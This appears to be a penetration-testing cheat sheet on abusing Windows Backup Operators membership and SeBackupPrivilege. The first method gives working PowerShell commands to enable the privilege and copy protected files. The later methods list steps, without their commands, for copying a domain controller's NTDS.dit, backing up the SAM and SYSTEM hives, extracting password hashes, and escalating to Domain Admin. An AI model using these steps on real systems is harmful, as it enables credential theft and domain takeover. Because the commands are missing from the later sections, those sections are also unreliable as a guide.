githubEdit

backup-operators

METHOD: 1 - Using seBackupPrivilege (enable privilege)

Import library

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

List the privilege

whoami /priv

Enable SeBackupPrivilege

Set-SeBackupPrivilege
Get-SeBackupPrivilege

Access file

dir C:\Confidential\
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\contract.txt
type .\contract.txt

METHOD: 2 - Attacking a Domain Controller - Copy NTDS.dit

Start tool (GUI)

diskshadow.exe

Create a file of these commands (e.g. backup_sys.txt)

Run script to take system backup (evil-winrm)

List system files

Copy ntds.dit file

Backup SAM and SYSTEM registry hives (fix errors)

Extracting credentials from NTDS.dit

Using impacket-secretsdump

DSInternals.psd1

METHOD: 3 (local backup)

Copy files

Extract hashes

METHOD: 4 tool

GitHub - mpgn/BackupOperatorToDA: From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controllerarrow-up-right

Last updated